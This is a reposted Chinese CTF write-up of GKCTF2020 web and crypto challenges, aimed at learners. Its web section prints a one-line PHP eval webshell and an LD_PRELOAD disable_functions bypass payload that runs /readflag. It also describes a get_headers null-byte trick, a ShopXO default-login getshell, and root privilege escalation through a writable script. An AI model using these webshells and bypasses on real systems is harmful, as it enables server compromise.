GKCTF2020--部分复现(加密和web)

2024-01-23 21:32

本文主要是介绍GKCTF2020--部分复现(加密和web),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

GKCTF2020–web

CheckIN

title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{public $code = null;public $decode = null;function __construct(){$this->code = @$this->x()['Ginkgo'];$this->decode = @base64_decode( $this->code );@Eval($this->decode);}public function x(){return $_REQUEST;}
}
new ClassName();

查看源码,不难发现,
在这里插入图片描述
有个eval()函数,并且将我们传入的参数进行base64解码再传入eval
没有任何过滤,传入ls 发现没用

phpinfo()

看看
在这里插入图片描述
看到disable_function
在这里插入图片描述
禁用了系统函数,我们写个马进去试试

eval($_POST[penson]);

在这里插入图片描述
由于他禁用了system函数,所以用蚁剑连接看看

在这里插入图片描述
发现根目录下有个readflag
估计就是要我们绕过disabled_function了
可以通过LD_PRELOAD这个环境变量,具体原理百度都能搜到,就不放了。
POC链接
下载他的poc链接
在传文件的时候,发现/var/html/www下并没有写权限,而其他目录却有
所以我上传到/vat/tmp目录下
在这里插入图片描述
然后用include()包含我们上传的php文件

include('/var/tmp/bypass_disablefunc.php');

在这里插入图片描述
可以发现成功包含,利用POC执行/readflag
payload

Ginkgo=aW5jbHVkZSgnL3Zhci90bXAvYnlwYXNzX2Rpc2FibGVmdW5jLnBocCcpOw==&cmd=/readflag&outpath=/tmp/xx&sopath=/var/tmp/bypass_disablefunc_x64.so

在这里插入图片描述

cve版签到

题目给出了提示
在这里插入图片描述
搜一波
CVE漏洞介绍
在这里插入图片描述
关键在于get_headers()函数
在这里插入图片描述
点一下进去
在这里插入图片描述
大家应该都知道127.0.0.1是本地嘛,利用那个cve漏洞,加%00截断,访问本地进去
在这里插入图片描述
他说要是123
改成123
在这里插入图片描述
flag就出来了

[GKCTF2020]老八小超市儿

在这里插入图片描述百度搜搜ShopXo漏洞
漏洞复现地址
进到后台直接使用默认账号密码登录
在这里插入图片描述
getshell
在这里插入图片描述
就按照教程来就行了

在这里插入图片描述
看上面给的链接一步一步来就行了,不多说了
Webshell的路径为/public/static/index/default/2.php
在这里插入图片描述
成功getshell
蚁剑连接
成功连接之后发现去根目录找flag,发现flag在/root目录下
在这里插入图片描述
这说明我们还得提权,获得更高的权限,可以发现有个特别红的玩意,我们点进去看看
在这里插入图片描述
在这里插入图片描述
有个python脚本,并且说出了他的位置,看一下python脚本
在这里插入图片描述
看的提示,说明这个脚本有root权限,属于root这个用户,并且这个脚本有写权限,

在这里插入图片描述
就可以根据这个python脚本来获取flag
因为这个脚本有写权限,就可以改下脚本,读取flag

在这里插入图片描述
但是呢这个脚本我们没有权限可以去执行,所以不行,回到根目录下的一个shell文件
在这里插入图片描述
在这里插入图片描述
他可以执行这个脚本
那咱们运行这个shell来看看
在这里插入图片描述
最终发现这个shell是可以成功运行的,flag到手

CRYPTO

小学生的密码学

在这里插入图片描述
把他给出的表达式一搜,就有仿射密码
在这里插入图片描述
base64编码即可

汉字的秘密

百度一搜会搜到当铺密码
当铺密码原理解释

在这里插入图片描述
然后你会发现第一个字符ascii加一就是F,第二个字符加2就是L
正好是flag
写脚本跑

a =[69,74,62,67,118,83,72,77,86,55,71,57,82,57,64,63,51,103]
str =""
j=0for i in a:j += 1str +=chr(i+j)print(i)print(str)

在这里插入图片描述
把y改成括号即可

这篇关于GKCTF2020--部分复现(加密和web)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/637596

相关文章

Python Web框架Flask、Streamlit、FastAPI示例详解

《PythonWeb框架Flask、Streamlit、FastAPI示例详解》本文对比分析了Flask、Streamlit和FastAPI三大PythonWeb框架:Flask轻量灵活适合传统应用... 目录概述Flask详解Flask简介安装和基础配置核心概念路由和视图模板系统数据库集成实际示例Stre

使用zip4j实现Java中的ZIP文件加密压缩的操作方法

《使用zip4j实现Java中的ZIP文件加密压缩的操作方法》本文介绍如何通过Maven集成zip4j1.3.2库创建带密码保护的ZIP文件,涵盖依赖配置、代码示例及加密原理,确保数据安全性,感兴趣的... 目录1. zip4j库介绍和版本1.1 zip4j库概述1.2 zip4j的版本演变1.3 zip4

SpringBoot中SM2公钥加密、私钥解密的实现示例详解

《SpringBoot中SM2公钥加密、私钥解密的实现示例详解》本文介绍了如何在SpringBoot项目中实现SM2公钥加密和私钥解密的功能,通过使用Hutool库和BouncyCastle依赖,简化... 目录一、前言1、加密信息(示例)2、加密结果(示例)二、实现代码1、yml文件配置2、创建SM2工具

python实现对数据公钥加密与私钥解密

《python实现对数据公钥加密与私钥解密》这篇文章主要为大家详细介绍了如何使用python实现对数据公钥加密与私钥解密,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录公钥私钥的生成使用公钥加密使用私钥解密公钥私钥的生成这一部分,使用python生成公钥与私钥,然后保存在两个文

如何使用Maven创建web目录结构

《如何使用Maven创建web目录结构》:本文主要介绍如何使用Maven创建web目录结构的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录创建web工程第一步第二步第三步第四步第五步第六步第七步总结创建web工程第一步js通过Maven骨架创pytho

Java Web实现类似Excel表格锁定功能实战教程

《JavaWeb实现类似Excel表格锁定功能实战教程》本文将详细介绍通过创建特定div元素并利用CSS布局和JavaScript事件监听来实现类似Excel的锁定行和列效果的方法,感兴趣的朋友跟随... 目录1. 模拟Excel表格锁定功能2. 创建3个div元素实现表格锁定2.1 div元素布局设计2.

如何使用Haporxy搭建Web群集

《如何使用Haporxy搭建Web群集》Haproxy是目前比较流行的一种群集调度工具,同类群集调度工具有很多如LVS和Nginx,本案例介绍使用Haproxy及Nginx搭建一套Web群集,感兴趣的... 目录一、案例分析1.案例概述2.案例前置知识点2.1 HTTP请求2.2 负载均衡常用调度算法 2.

在Spring Boot中实现HTTPS加密通信及常见问题排查

《在SpringBoot中实现HTTPS加密通信及常见问题排查》HTTPS是HTTP的安全版本,通过SSL/TLS协议为通讯提供加密、身份验证和数据完整性保护,下面通过本文给大家介绍在SpringB... 目录一、HTTPS核心原理1.加密流程概述2.加密技术组合二、证书体系详解1、证书类型对比2. 证书获

python web 开发之Flask中间件与请求处理钩子的最佳实践

《pythonweb开发之Flask中间件与请求处理钩子的最佳实践》Flask作为轻量级Web框架,提供了灵活的请求处理机制,中间件和请求钩子允许开发者在请求处理的不同阶段插入自定义逻辑,实现诸如... 目录Flask中间件与请求处理钩子完全指南1. 引言2. 请求处理生命周期概述3. 请求钩子详解3.1

SpringBoot项目Web拦截器使用的多种方式

《SpringBoot项目Web拦截器使用的多种方式》在SpringBoot应用中,Web拦截器(Interceptor)是一种用于在请求处理的不同阶段执行自定义逻辑的机制,下面给大家介绍Sprin... 目录一、实现 HandlerInterceptor 接口1、创建HandlerInterceptor实